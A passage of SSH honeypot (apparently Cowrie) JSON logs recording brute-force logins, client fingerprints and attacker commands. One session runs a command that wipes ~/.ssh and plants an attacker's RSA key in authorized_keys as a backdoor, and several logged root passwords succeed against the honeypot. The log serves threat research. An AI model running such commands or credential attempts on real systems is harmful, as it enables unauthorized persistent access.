e-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:45.025155Z","src_ip":"212.227.235.229","session":"f9a37c432e95"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:30:45.351740Z","src_ip":"212.227.235.229","session":"f9a37c432e95"}
{"eventid":"cowrie.session.closed","duration":"0.5","message":"Connection lost after 0.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:45.426168Z","src_ip":"212.227.235.229","session":"f9a37c432e95"}
{"eventid":"cowrie.session.closed","duration":"4.8","message":"Connection lost after 4.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:45.427187Z","src_ip":"212.227.235.229","session":"7a07aa76eaaf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:30:45.929843Z","src_ip":"212.227.235.229","session":"6723f96c1afa"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:47.202318Z","src_ip":"212.227.235.229","session":"6723f96c1afa"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41288,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e4acbed2d57","protocol":"ssh","message":"New connection: 212.227.235.229:41288 (1.2.3.4:22) [session: 0e4acbed2d57]","sensor":"my-vps","timestamp":"2025-08-26T04:30:47.471830Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:30:47.473156Z","src_ip":"212.227.235.229","session":"0e4acbed2d57"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:30:47.742798Z","src_ip":"212.227.235.229","session":"0e4acbed2d57"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:30:48.862051Z","src_ip":"212.227.235.229","session":"0e4acbed2d57"}
{"eventid":"cowrie.session.closed","duration":"11.0","message":"Connection lost after 11.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:49.132481Z","src_ip":"212.227.235.229","session":"940ae4808100"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:30:49.133845Z","src_ip":"212.227.235.229","session":"0e4acbed2d57"}
{"eventid":"cowrie.session.connect","src_ip":"93.123.109.181","src_port":48150,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffca4ca218be","protocol":"ssh","message":"New connection: 93.123.109.181:48150 (1.2.3.4:22) [session: ffca4ca218be]","sensor":"my-vps","timestamp":"2025-08-26T04:31:03.131691Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T04:31:03.256843Z","src_ip":"93.123.109.181","session":"ffca4ca218be"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-26T04:31:03.257615Z","src_ip":"93.123.109.181","session":"ffca4ca218be"}
{"eventid":"cowrie.login.failed","username":"ethereum","password":"ethereum","message":"login attempt [ethereum/ethereum] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:04.111494Z","src_ip":"93.123.109.181","session":"ffca4ca218be"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:05.133307Z","src_ip":"93.123.109.181","session":"ffca4ca218be"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":32976,"dst_ip":"1.2.3.4","dst_port":22,"session":"d719a64bde7b","protocol":"ssh","message":"New connection: 212.227.235.229:32976 (1.2.3.4:22) [session: d719a64bde7b]","sensor":"my-vps","timestamp":"2025-08-26T04:31:12.722914Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:12.724515Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:13.011297Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.login.success","username":"root","password":"!@34QWer","message":"login attempt [root/!@34QWer] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:31:14.198412Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:31:14.846013Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:31:14.846766Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T04:31:14.847891Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:15.134949Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T04:31:15.728118Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T04:31:15.728817Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.017110Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.018081Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58596,"dst_ip":"1.2.3.4","dst_port":22,"session":"0e3ff8405540","protocol":"ssh","message":"New connection: 212.227.125.160:58596 (1.2.3.4:22) [session: 0e3ff8405540]","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.280732Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58918,"dst_ip":"1.2.3.4","dst_port":22,"session":"e7a5e4f1d27e","protocol":"ssh","message":"New connection: 212.227.235.229:58918 (1.2.3.4:22) [session: e7a5e4f1d27e]","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.301562Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.302571Z","src_ip":"212.227.235.229","session":"e7a5e4f1d27e"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:16.587577Z","src_ip":"212.227.235.229","session":"e7a5e4f1d27e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T04:31:17.191769Z","src_ip":"212.227.125.160","session":"0e3ff8405540"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:17.768664Z","src_ip":"212.227.235.229","session":"e7a5e4f1d27e"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: dd9bcf093c355da7000132131cb36fd0","sensor":"my-vps","timestamp":"2025-08-26T04:31:18.138238Z","src_ip":"212.227.125.160","session":"0e3ff8405540"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:20.265731Z","src_ip":"212.227.235.229","session":"e7a5e4f1d27e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58928,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0ff13efc14c","protocol":"ssh","message":"New connection: 212.227.235.229:58928 (1.2.3.4:22) [session: f0ff13efc14c]","sensor":"my-vps","timestamp":"2025-08-26T04:31:20.539208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:20.540149Z","src_ip":"212.227.235.229","session":"f0ff13efc14c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:20.814908Z","src_ip":"212.227.235.229","session":"f0ff13efc14c"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:31:23.637997Z","src_ip":"212.227.235.229","session":"f0ff13efc14c"}
{"eventid":"cowrie.session.closed","duration":"7.6","message":"Connection lost after 7.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:23.832324Z","src_ip":"212.227.125.160","session":"0e3ff8405540"}
{"eventid":"cowrie.session.closed","duration":"11.2","message":"Connection lost after 11.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:23.913927Z","src_ip":"212.227.235.229","session":"d719a64bde7b"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:23.914905Z","src_ip":"212.227.235.229","session":"f0ff13efc14c"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54230,"dst_ip":"1.2.3.4","dst_port":22,"session":"5424cb9fb865","protocol":"ssh","message":"New connection: 217.72.205.35:54230 (1.2.3.4:22) [session: 5424cb9fb865]","sensor":"my-vps","timestamp":"2025-08-26T04:31:27.312048Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:31:27.313236Z","src_ip":"217.72.205.35","session":"5424cb9fb865"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47474,"dst_ip":"1.2.3.4","dst_port":22,"session":"8af2e6d4d9b8","protocol":"ssh","message":"New connection: 212.227.235.229:47474 (1.2.3.4:22) [session: 8af2e6d4d9b8]","sensor":"my-vps","timestamp":"2025-08-26T04:31:31.091690Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:31.092883Z","src_ip":"212.227.235.229","session":"8af2e6d4d9b8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T04:31:31.338538Z","src_ip":"212.227.235.229","session":"8af2e6d4d9b8"}
{"eventid":"cowrie.login.failed","username":"innova","password":"innova","message":"login attempt [innova/innova] failed","sensor":"my-vps","timestamp":"2025-08-26T04:31:32.372461Z","src_ip":"212.227.235.229","session":"8af2e6d4d9b8"}
{"eventid":"cowrie.session.connect","src_ip":"68.183.87.241","src_port":48680,"dst_ip":"1.2.3.4","dst_port":22,"session":"bae269146f2f","protocol":"ssh","message":"New connection: 68.183.87.241:48680 (1.2.3.4:22) [session: bae269146f2f]","sensor":"my-vps","timestamp":"2025-08-26T04:31:33.255089Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T04:31:33.256090Z","src_ip":"68.183.87.241","session":"bae269146f2f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr